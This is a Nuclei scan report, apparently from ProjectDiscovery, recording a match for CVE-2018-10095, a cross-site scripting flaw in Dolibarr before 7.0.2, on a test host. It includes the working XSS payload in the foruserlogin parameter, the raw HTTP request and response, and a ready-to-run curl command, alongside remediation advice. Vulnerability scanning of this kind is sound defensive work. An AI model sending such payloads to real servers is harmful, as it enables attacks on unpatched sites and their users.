Dolibarr <7.0.2 - Cross-Site Scripting (CVE-2018-10095) found on honey.scanme.sh

[mkrs2404]

Details: CVE-2018-10095 matched at honey.scanme.sh

Protocol: HTTP

Full URL: https://honey.scanme.sh/dolibarr/adherents/cartes/carte.php?mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print

Timestamp: Tue Apr 30 13:42:05 +0000 UTC 2024

Source: https://cloud.projectdiscovery.io/vuln/6586cbfcd34f10dbba27c85437f584f7

Template Information

Key	Value
Name	Dolibarr <7.0.2 - Cross-Site Scripting
Authors	pikpikcu
Tags	cve2018, cve, xss, dolibarr
Severity	medium
Description	Dolibarr before 7.0.2 is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via the foruserlogin parameter to adherents/cartes/carte.php.
Remediation	Upgrade to Dolibarr version 7.0.2 or later to mitigate this vulnerability.
CVSS-Metrics	CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE-ID	CWE-79
CVE-ID	CVE-2018-10095
CVSS-Score	6.10
vendor	dolibarr
product	dolibarr

Request

GET /dolibarr/adherents/cartes/carte.php?mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.52
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 399
Content-Type: text/html
Date: Tue, 30 Apr 2024 13:42:05 GMT

GET /dolibarr/adherents/cartes/carte.php?mode=cardlogin&foruserlogin=</script><script>alert(document.domain)</script>&model=5160&optioncss=print HTTP/1.1
Host: honey.scanme.sh
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.52

References:

• https://sysdream.com/news/lab/2018-05-21-cve-2018-10095-dolibarr-xss-injection-vulnerability/
• https://github.com/Dolibarr/dolibarr/commit/1dc466e1fb687cfe647de4af891720419823ed56
• https://github.com/Dolibarr/dolibarr/blob/7.0.2/ChangeLog
• https://nvd.nist.gov/vuln/detail/CVE-2018-10095
• http://www.openwall.com/lists/oss-security/2018/05/21/3

CURL command

curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.52' 'https://honey.scanme.sh/dolibarr/adherents/cartes/carte.php?mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print'

---

Generated by Nuclei v3.2.5